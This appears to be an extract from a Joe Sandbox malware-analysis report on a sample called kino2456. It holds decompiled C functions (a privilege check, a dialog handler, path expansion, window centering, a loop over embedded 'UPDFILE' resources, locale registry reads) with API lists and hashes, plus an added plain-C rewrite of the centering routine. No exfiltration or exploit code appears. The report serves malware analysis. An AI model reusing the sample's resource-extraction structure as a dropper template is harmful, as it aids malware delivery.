                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0096182C
                                                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(009618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009618DD), ref: 00961855
                                                                                                                                                                                                                                    • FreeSid.ADVAPI32(?,?,?,?,009618DD), ref: 00961883
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,009618DD), ref: 0096188A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                    • Opcode ID: ee3a5d2aa6384863cc265357acb1f4bd7ba3b033167874b12e57aa30a8b0ff6a
                                                                                                                                                                                                                                    • Instruction ID: 1b7b5ac5e836336f800a637911f01db4831bec10ea0b83654ed1eec378c4ece4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee3a5d2aa6384863cc265357acb1f4bd7ba3b033167874b12e57aa30a8b0ff6a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1211B271E14209AFDB109FA4DC49ABEBBB8EF49700F14056EFA01F3290DB709D049B91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00963450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                                                    				int _t22;
                                                                                                                                                                                                                                    				struct HWND__* _t24;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                    				if(_t7 == 0) {
                                                                                                                                                                                                                                    					EndDialog(_a4, 2);
                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                    				if(_t11 == 0) {
                                                                                                                                                                                                                                    					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                    					_t24 = _a4;
                                                                                                                                                                                                                                    					E009643D0(_t24, _t12);
                                                                                                                                                                                                                                    					SetWindowTextA(_t24, "doza2");
                                                                                                                                                                                                                                    					SetDlgItemTextA(_t24, 0x838,  *0x969404);
                                                                                                                                                                                                                                    					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t11 == 1) {
                                                                                                                                                                                                                                    					_t22 = _a12;
                                                                                                                                                                                                                                    					if(_t22 < 6) {
                                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t22 <= 7) {
                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                    						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t22 != 0x839) {
                                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *0x9691dc = 1;
                                                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}

Addresses from the function's graph view (graph layout not preserved): 0x00963459, 0x0096345c, 0x009634d8, 0x009634de, 0x00000000, 0x009634e0, 0x0096345e, 0x00963463, 0x0096349a, 0x009634a0, 0x009634a7, 0x009634b2, 0x009634c4, 0x009634cb, 0x00000000, 0x009634cb, 0x00963468, 0x0096346e, 0x00963474, 0x00000000, 0x00000000, 0x0096347c, 0x0096348c, 0x00963490, 0x00000000, 0x00963496, 0x00963484, 0x00000000, 0x00000000, 0x00963486, 0x00000000, 0x00963486, 0x00000000

APIs
• EndDialog.USER32(?,?), ref: 00963490
• GetDesktopWindow.USER32 ref: 0096349A
• SetWindowTextA.USER32(?,doza2), ref: 009634B2
• SetDlgItemTextA.USER32(?,00000838), ref: 009634C4
• SetForegroundWindow.USER32(?), ref: 009634CB
• EndDialog.USER32(?,00000002), ref: 009634D8
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Window$DialogText$DesktopForegroundItem
• String ID: doza2
• API String ID: 852535152-612509477
• Opcode ID: b68d8dfd13a0b782f6f9b56bc600eb85411acf445edf6eddfd1c11bf9659dad6
• Instruction ID: 441d1f69269209aa9157df42f875e5fa5fee974550a4d435842271c5675644bb
• Opcode Fuzzy Hash: b68d8dfd13a0b782f6f9b56bc600eb85411acf445edf6eddfd1c11bf9659dad6
• Instruction Fuzzy Hash: A101D431268114ABCB165F65DC0C96DBB68EB46740F11C418F947965B0CFB49F51EF81
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 95%
			E00962AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x968004; // 0xf4cc89a0
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x969a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00961680(_t65, E009617C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E009665E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00961680(_t65, E009617C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                    								} while (_t42 != 0);
                                                                                                                                                                                                                                    								L17:
                                                                                                                                                                                                                                    								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *_t65 = _t17;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00966CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                    			}

Instruction address column for the decompiled function above (one address per source line, detached from the code by extraction): 0x00962aac, 0x00962ab7, 0x00962abc, 0x00962abe, 0x00962ac3, 0x00962ac6, 0x00962ac9, 0x00962ace, 0x00962ae6, 0x00962bdc, 0x00962bdc, 0x00962be0, 0x00000000, 0x00000000, 0x00962af2, 0x00962afc, 0x00962b00, 0x00962b05, 0x00962b05, 0x00962b0b, 0x00962bca, 0x00962bd1, 0x00962b11, 0x00962b18, 0x00962b26, 0x00962b99, 0x00962bc8, 0x00000000, 0x00000000, 0x00962b9b, 0x00962bae, 0x00962bb3, 0x00962bb5, 0x00962bb5, 0x00962bb8, 0x00962bb8, 0x00962bba, 0x00962bbb, 0x00000000, 0x00962bb8, 0x00962b28, 0x00962b2e, 0x00962b33, 0x00962b39, 0x00962b3c, 0x00962b3c, 0x00962b3e, 0x00962b3f, 0x00962b55, 0x00962b5d, 0x00962b64, 0x00962b64, 0x00962b7a, 0x00962b7f, 0x00962b81, 0x00962b81, 0x00962b84, 0x00962b84, 0x00962b86, 0x00962b87, 0x00962bbf, 0x00962bc1, 0x00962bc1, 0x00962b26, 0x00962bda, 0x00962bda, 0x00962be6, 0x00962be6, 0x00962bf8

APIs
• GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00962AE6
• IsDBCSLeadByte.KERNEL32(00000000), ref: 00962AF2
• CharNextA.USER32(?), ref: 00962B12
• CharUpperA.USER32 ref: 00962B1E
• CharPrevA.USER32(?,?), ref: 00962B55
• CharNextA.USER32(?), ref: 00962BD4
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
• String ID:
• API String ID: 571164536-0
• Opcode ID: 6284479df125b3c20d46a63e74926a416ce7171c8ed759190a0ef52b92f1a157
• Instruction ID: 350d0fc0f49c2218a05ca54b25503d1d1930946f0b2da9be88d66b8a25a40848
• Opcode Fuzzy Hash: 6284479df125b3c20d46a63e74926a416ce7171c8ed759190a0ef52b92f1a157
• Instruction Fuzzy Hash: A74123346086455EDB159F348C14AFD7BADDF93300F18009EE8C297202DBB58E86DB61
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E009643D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				struct tagRECT _v24;
                                                                                                                                                                                                                                    				struct tagRECT _v40;
                                                                                                                                                                                                                                    				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x968004; // 0xf4cc89a0 - global XORed with the frame pointer here and handed to E00966CE0 on return, the usual MSVC /GS stack-cookie pattern
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;                     // __ecx: window to move; __edx: window to center it over
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;    // height of the window being moved
				_v48 = _v40.right - _v40.left;    // its width
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;    // height of the reference window
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);    // 8 = HORZRES: screen width in pixels
				_v60 = GetDeviceCaps(_t69, 0xa);  // 0xa = VERTRES: screen height in pixels
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");                       // cdq / sub / sar 1 is a signed divide by two; after cdq the decompiler's _t63 stands for the sign word in edx, not the HWND loaded above
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;   // x = ref.left + (ref.width - width) / 2
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {      // keep the right edge on screen
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;                  // clamp to the left screen edge
				}
				asm("cdq");                       // same idiom for y; _t63 is again the sign word here
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;   // y = ref.top + (ref.height - height) / 2
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {      // keep the bottom edge on screen
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;                  // clamp to the top screen edge
				}
				// flags 5 = SWP_NOSIZE | SWP_NOZORDER: only the position changes, size and z-order are left alone
				return E00966CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

				Instruction addresses of the decompiled statements above, in order: 0x009643d0, 0x009643d8, 0x009643df, 0x009643e6, 0x009643ec, 0x009643f1, 0x00964400, 0x00964403, 0x0096440b, 0x00964420, 0x00964429, 0x00964437, 0x00964444, 0x00964447, 0x0096444d, 0x00964454, 0x0096445b, 0x00964460, 0x00964461, 0x00964467, 0x0096446f, 0x00964473, 0x00964473, 0x00964463, 0x00964463, 0x00964463, 0x0096447a, 0x00964481, 0x00964484, 0x0096448a, 0x00964492, 0x00964496, 0x00964496, 0x00964486, 0x00964486, 0x00964486, 0x009644b8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 009643F1
                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0096440B
                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00964423
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0096442E
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0096443A
                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00964447
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 009644A2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
				• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
				• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
				• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
				• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                                                    • Opcode ID: d9506d3a99cc10920a25401c832c4978edb48a0425e5f28daddc2270dbb52d79
                                                                                                                                                                                                                                    • Instruction ID: e8a4f6e4f11bce13e65cc83e259792b05cfa863b2abf4daf8e91acc7eb04e4a0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9506d3a99cc10920a25401c832c4978edb48a0425e5f28daddc2270dbb52d79
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B314932E14119AFCB14CFF8DD899EEBBB9EB89310F154169F805B3250DA74AC059BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%
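The decompiled routine above centers one window over another and clamps the result to the screen, but the decompiler's reuse of _t63 for the sign word produced by cdq makes the arithmetic hard to read. The following is an added example written for this report, not code from the sample or from Joe Sandbox: it re-expresses that logic in plain C with a portable stand-in for the cdq/sub/sar signed divide-by-two, so an analyst can check the interpretation against concrete coordinates. The names sar_div2, center_and_clamp and rect_t are hypothetical; the screen_w and screen_h parameters stand for the GetDeviceCaps(HORZRES = 8) and GetDeviceCaps(VERTRES = 10) results, and the Win32 calls themselves are left out so the example compiles anywhere.

```c
#include <stdint.h>
#include <stdio.h>

/* Stand-in for the Win32 RECT so this compiles without <windows.h>. */
typedef struct { int32_t left, top, right, bottom; } rect_t;

/* What the compiler emitted for a signed "/ 2": cdq; sub eax, edx; sar eax, 1.
 * cdq copies the sign of eax into edx (0 or -1), so (x - sign) >> 1 truncates
 * toward zero exactly like C's x / 2, including for negative odd values. */
int32_t sar_div2(int32_t x) {
    int32_t sign = (x < 0) ? -1 : 0;   /* portable equivalent of cdq */
    return (x - sign) >> 1;            /* arithmetic shift on mainstream compilers */
}

/* Hypothetical name for the logic of the decompiled routine: center a window of
 * size w x h over `ref`, then clamp it to a screen_w x screen_h display.
 * screen_w / screen_h stand for GetDeviceCaps(HORZRES = 8) / GetDeviceCaps(VERTRES = 10).
 * The original then calls SetWindowPos(hwnd, 0, x, y, 0, 0, 5), where
 * 5 = SWP_NOSIZE | SWP_NOZORDER, so only the position changes. */
void center_and_clamp(rect_t ref, int32_t w, int32_t h,
                      int32_t screen_w, int32_t screen_h,
                      int32_t *out_x, int32_t *out_y)
{
    int32_t x = sar_div2((ref.right - ref.left) - w) + ref.left;
    int32_t y = sar_div2((ref.bottom - ref.top) - h) + ref.top;

    if (x < 0)                 x = 0;              /* left edge clamp   */
    else if (x + w > screen_w) x = screen_w - w;   /* right edge clamp  */

    if (y < 0)                 y = 0;              /* top edge clamp    */
    else if (y + h > screen_h) y = screen_h - h;   /* bottom edge clamp */

    *out_x = x;
    *out_y = y;
}

int main(void) {
    int32_t x, y;

    /* Constructed input: a 400x300 window centered over an 800x600 window
     * at (100,100) on a 1920x1080 screen. */
    rect_t ref = { 100, 100, 900, 700 };
    center_and_clamp(ref, 400, 300, 1920, 1080, &x, &y);
    printf("centered at (%d, %d)\n", x, y);   /* (300, 250) */

    /* Constructed input: reference window hanging off the left of the screen,
     * so the negative x is clamped to 0. */
    rect_t off = { -500, 50, -100, 250 };
    center_and_clamp(off, 600, 100, 1920, 1080, &x, &y);
    printf("clamped to (%d, %d)\n", x, y);    /* (0, 100) */
    return 0;
}
```

The second constructed case exercises the branch where cdq matters: (400 - 600) is negative, and the sub/sar pair truncates -100 toward zero rather than flooring, which is why a plain `>> 1` would not faithfully reproduce the compiled code for odd differences.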

                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E00966298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                    				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x968004; // 0xf4cc89a0
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0096171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x969124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x96a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0096171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00966CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

APIs
  • Part of subcall function 0096171E: _vsnprintf.MSVCRT ref: 00961750
• LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,009651CA,00000004,00000024,00962F71,?,00000002,00000000), ref: 009662CD
• LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,009651CA,00000004,00000024,00962F71,?,00000002,00000000), ref: 009662D4
• FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009651CA,00000004,00000024,00962F71,?,00000002,00000000), ref: 0096631B
• FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00966345
• FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009651CA,00000004,00000024,00962F71,?,00000002,00000000), ref: 00966357
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Resource$Free$FindLoadLock_vsnprintf
• String ID: UPDFILE%lu
• API String ID: 2922116661-2329316264
• Opcode ID: be2f84f6511bc435f4d17f36d4c402ee20d79e631d85e6e60338bc73866dc47d
• Instruction ID: a04c8f0bec5220e935b715b6ee69e1424974277c8d960077a01297ccfe92e49c
• Opcode Fuzzy Hash: be2f84f6511bc435f4d17f36d4c402ee20d79e631d85e6e60338bc73866dc47d
• Instruction Fuzzy Hash: D821F171A04219ABDB14AFA48C45DFFBB7CFB89714B04022DF902A3241DB799D069BE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E0096681F(void* __ebx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                    				void* _v172;
                                                                                                                                                                                                                                    				int* _v176;
                                                                                                                                                                                                                                    				int _v180;
                                                                                                                                                                                                                                    				int _v184;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t36 = __ebx;
                                                                                                                                                                                                                                    				_t19 =  *0x968004; // 0xf4cc89a0
                                                                                                                                                                                                                                    				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                    				_t41 =  *0x9681d8; // 0xfffffffe
                                                                                                                                                                                                                                    				_t43 = 0;
                                                                                                                                                                                                                                    				_v180 = 0xc;
                                                                                                                                                                                                                                    				_v176 = 0;
                                                                                                                                                                                                                                    				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                    					 *0x9681d8 = 0;
                                                                                                                                                                                                                                    					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                    					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                                                    						_t41 =  *0x9681d8; // 0xfffffffe
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t41 = 1;
                                                                                                                                                                                                                                    						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t31 = RegQueryValueExA(_v172, 0x961140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                    							_t43 = _t31;
                                                                                                                                                                                                                                    							RegCloseKey(_v172);
                                                                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t40 =  &_v176;
                                                                                                                                                                                                                                    								if(E009666F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                    									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                    										 *0x9681d8 = _t41;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										goto L12;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00966CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0096686E
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004A), ref: 009668A7
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009668CC
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00961140,00000000,?,?,0000000C), ref: 009668F4
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00966902
                                                                                                                                                                                                                                      • Part of subcall function 009666F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0096691A), ref: 00966741
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Control Panel\Desktop\ResourceLocale, xrefs: 009668C2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                    • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                    • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                    • Opcode ID: e98f5288984414ade9d308901b4e66c74b77676b6b2a3e72c5b4a602850765a7
